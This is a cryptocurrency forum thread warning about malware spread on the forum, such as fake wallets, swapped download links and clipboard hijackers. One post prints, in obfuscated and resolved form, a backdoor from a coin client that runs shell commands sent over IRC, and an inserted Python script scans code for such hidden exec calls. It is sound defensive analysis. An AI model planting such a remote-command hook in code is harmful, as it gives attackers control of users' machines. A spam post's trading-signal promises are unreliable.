riffat
Jr. Member
Offline
Activity: 149
Merit: 4
|
|
February 02, 2018, 10:20:46 AM |
|
> No antivirus will protect you from the 0-day vulnerability. But following the rules of hygiene on the Internet, you at least protect yourself from 98% of threats. I add that if you really want to go to the link, check it at first with the service virustotal:
Thanks for your good suggestion...
|
【BLACKBOX OS】 (https://blackboxfoundation.org/) 【The Future of Work. Decentralized.】
|
|
|
Masternodeking
Newbie
Offline
Activity: 42
Merit: 0
|
|
February 03, 2018, 01:10:43 AM |
|
Correct me if I'm wrong, but malware, it's generally for executables in Windows, no? I mean the wallets are, but isn't Kaspersky enough? If not, why do we need to protect from the case of retrieving passwords from the users and other stuff from even pen drives with wallets (including the common coins ones) like DOGE, LTC, BTC and a few more?
Has anyone heard of people gaining access to people's private keys by watching them write it down by hacking the laptop camera? Or malware that will replace the pasted address with the hacker's address?
|
|
|
|
coindrunk
Newbie
Offline
Activity: 29
Merit: 0
|
|
February 04, 2018, 12:18:11 AM |
|
If you are on Linux/Unix just use separate user accounts, with restricted access, for each wallet software that tends to be shady
|
|
|
|
Becassine
|
|
February 05, 2018, 03:10:40 AM |
|
> No antivirus will protect you from the 0-day vulnerability. But following the rules of hygiene on the Internet, you at least protect yourself from 98% of threats. I add that if you really want to go to the link, check it at first with the service virustotal:
Thank you very much for that thing, I will post it in the French section. We don't have such a useful thread there.
|
|
|
|
Becassine
|
|
February 05, 2018, 03:21:34 AM |
|
> I don't know if this is a malware or what, but every time I copy an address and paste it where I should when I intend to send some funds, the address is changed, some characters are omitted. That's why when making transactions I used my phone instead of my PC. Does anyone experience this too? If this is a malware infection, what should I do?
Evrial detects when a bitcoin address is copied to the clipboard, then proceeds to replace it with an address that is under the attacker's domain. However, the virus manages to paste this information into a different application, which makes it more complex, they say. https://tuscamisetas.net/crypto/new-virus-changes-bitcoin-addresses-from-the-clipboard-to-one-from-the-attacker-criptonews/
|
|
|
|
ksyusha_so
Jr. Member
Offline
Activity: 72
Merit: 4
|
|
February 05, 2018, 07:07:58 AM |
|
I personally didn't confront anything like that, luckily, but thank you very much for the information. If I find someone, I'll add it to the list.
|
░|∙.Blend.∙|░░|Blend, the all-in-one solution for cross-platform lending investments|░ (http://blendcoins.io/)
|
|
|
mtthardy4
Newbie
Offline
Activity: 2
Merit: 0
|
|
February 06, 2018, 11:43:14 AM |
|
If you needed to earn good profit through cryptocurrencies then go to this blog http://cryptocurrenciesconsultant.blogspot.com/ Just buy its consultant service and he would predict and provide you good signals to buy and sell any crypto coins. Most of his predictions are about 90% perfect. He had good trading experience to help out other traders as well. If you had any question about how to buy / sell or any related question about the trading and cryptocurrencies then contact him. I'm also using his service from last few months, so I'm sharing with you as well.
|
|
|
|
Becassine
|
|
February 06, 2018, 12:09:56 PM Last edit: February 08, 2018, 01:20:20 PM by Becassine |
|
Hello, I found a site that checks if you have an account that has been compromised in a data breach (https://haveibeenpwned.com/). I want to know from the super geeks if this site is OK? Thank you and have a nice day.
|
|
|
|
Marble777
Member
Offline
Activity: 736
Merit: 11
|
|
February 06, 2018, 05:17:30 PM |
|
> Thanks this was very informative. I guess this forum is a big target for malware developers who want to steal easy crypto money.
Obviously because we all know how much money this forum in digital form of course very tempting for hackers to use it by way of embed malware then we must be more careful
|
|
|
|
coin0101
Newbie
Offline
Activity: 42
Merit: 0
|
|
February 07, 2018, 07:18:30 AM |
|
> In the past months, malware infection attempts on this forum have become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans are no longer sufficient to ensure safety.
>
> "latest wallet"/"custom wallet"/"faster miner"
> A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt usually gets spotted pretty quickly.
>
> Copied/new ANN
> The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).
>
> Replacing links in quotes
> The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or an update post) and changes the link within the quote to a malware link.
>
> Compromised dev account
> The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.
>
> Packed/FUD executables
> In most of the cases above, the malware has little to no detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.
>
> Modified source with backdoor
> This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin, posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
>
> Here is the relevant source code:
>
>     if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
>     {
>         CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
>         if (buf)
>         {
>             std::string result = "";
>             while (!feof(buf))
>                 if (fgets(pszName, sizeof(pszName), buf) != NULL)
>                     result += pszName;
>             CFree(buf);
>             strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
>             if (strchr(pszName, '!'))
>                 *strchr(pszName, '!') = '\0';
>             Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
>         }
>     }
>
> Here is the source code with macros resolved:
>
>     // Trigger: an IRC PRIVMSG whose message text starts with the word "!"
>     if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
>     {
>         // The rest of the line, from vWords[4] on, is run as a shell command
>         FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
>         if (buf)
>         {
>             std::string result = "";
>             while (!feof(buf))
>                 if (fgets(pszName, sizeof(pszName), buf) != NULL)
>                     result += pszName;
>             pclose(buf);
>             // The sender's nick is cut out of the message prefix and the
>             // command output is sent back to that nick
>             strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
>             if (strchr(pszName, '!'))
>                 *strchr(pszName, '!') = '\0';
>             Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
>         }
>     }
>
> The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.

omg that's terrible thanks for sharing this
|
|
|
|
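Added example (not part of the thread or of the backdoored client): the snippet quoted above hides `popen` behind the macro `CRead`, so searching the handler for `popen(` finds nothing. This Python script resolves object-like `#define` aliases and reports every call that ends up at a process-execution function; the `#define` lines in `SAMPLE`, the function names and the sink list are assumptions constructed for illustration.

```python
import re

# Functions that start a process or shell (assumed list, extend as needed).
EXEC_SINKS = {"popen", "_popen", "system", "execl", "execlp", "execv",
              "execvp", "WinExec", "ShellExecuteA", "CreateProcessA"}

# Object-like macros only: "#define NAME replacement" (no parameter list).
DEFINE_RE = re.compile(r"^[ \t]*#[ \t]*define[ \t]+([A-Za-z_]\w*)[ \t]+(.+?)[ \t]*$", re.M)
CALL_RE = re.compile(r"\b([A-Za-z_]\w*)\s*\(")

def collect_macros(source):
    """Map each object-like macro name to its replacement text."""
    return dict(DEFINE_RE.findall(source))

def resolve(name, macros, max_depth=8):
    """Follow alias chains (A -> B -> popen); the bound stops cycles."""
    while max_depth and name in macros:
        name = macros[name]
        max_depth -= 1
    return name

def find_exec_calls(source):
    """Return (line_no, written_name, resolved_name) for every call that
    reaches an exec sink, whether written directly or through a macro."""
    macros = collect_macros(source)
    hits = []
    for line_no, line in enumerate(source.splitlines(), 1):
        if line.lstrip().startswith("#"):
            continue  # preprocessor lines are definitions, not calls
        for written in CALL_RE.findall(line):
            resolved = resolve(written, macros)
            if resolved in EXEC_SINKS:
                hits.append((line_no, written, resolved))
    return hits

# Constructed sample modelled on the snippet in the post; how and where the
# macros were defined in the real client is not shown there (assumption).
SAMPLE = '''\
#define CBuff "PRIVMSG"
#define CLine FILE
#define CRead popen
#define CFree pclose
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1) {
    CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
    if (buf) CFree(buf);
}
'''

if __name__ == "__main__":
    for line_no, written, resolved in find_exec_calls(SAMPLE):
        print(f"line {line_no}: {written}() resolves to {resolved}()")
```

Only object-like macros are resolved here; for a full audit, run the compiler's preprocessor (for example `g++ -E`) over each file and search its output for the same sink names.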
asifcoiner23
Newbie
Offline
Activity: 42
Merit: 0
|
|
February 07, 2018, 07:19:13 AM |
|
omg that's terrible thanks for sharing this
|
|
|
|
bitcoiner0101
Newbie
Offline
Activity: 56
Merit: 0
|
|
February 07, 2018, 07:19:26 AM |
|
omg that's terrible thanks for sharing this
|
|
|
|
crypto440
Newbie
Offline
Activity: 42
Merit: 0
|
|
February 07, 2018, 11:06:36 PM |
|
what is the coins name can you please tell me and others so we don't fall for this
|
|
|
|
Valer4ik
|
|
February 08, 2018, 01:53:35 PM |
|
excellent information thanks guys for the warning. you have done a great job, you are making our community safer. Another noticed one kind of SCAM .. that people who write to you in telegrams and represent managers of ICO projects and offer assistance in investing in their project .....
|
|
|
|
Marble777
Member
Offline
Activity: 736
Merit: 11
|
|
February 09, 2018, 03:28:44 PM |
|
> excellent information thanks guys for the warning. you have done a great job, you are making our community safer. Another noticed one kind of SCAM .. that people who write to you in telegrams and represent managers of ICO projects and offer assistance in investing in their project .....
Not everything like that bro although everyone wants to get big profits with little effort but still there are many parties who are not tempted by doing a scam
|
|
|
|
bembi
Newbie
Offline
Activity: 28
Merit: 0
|
|
February 09, 2018, 09:12:40 PM |
|
Thanks, that is really serious. I mean copying links would do that, we all should be careful.
|
|
|
|
richiesuazo
Newbie
Offline
Activity: 69
Merit: 0
|
|
February 10, 2018, 06:28:55 PM |
|
wooow, this is really a lot to swallow in for a newbie like me
|
|
|
|
XtianSincero
Newbie
Offline
Activity: 12
Merit: 0
|
|
February 11, 2018, 08:10:46 AM |
|
wow very much useful information... we should be more cautious now, especially downloading. thanks
|
|
|
|
saieshprakash18
Newbie
Offline
Activity: 28
Merit: 0
|
|
February 12, 2018, 02:41:51 AM |
|
thanks, this is helpful
|
|
|
|
Raul Lopez
|
|
February 12, 2018, 08:26:43 AM |
|
I appreciate very much this info, thanks a lot!!
|
■ ■ ■ ■ ■ ■ ■ Find the best price of any book. Book finder and recommendator ■ ■ ■ ■ ■ ■ ■ Libreris
|
|
|
|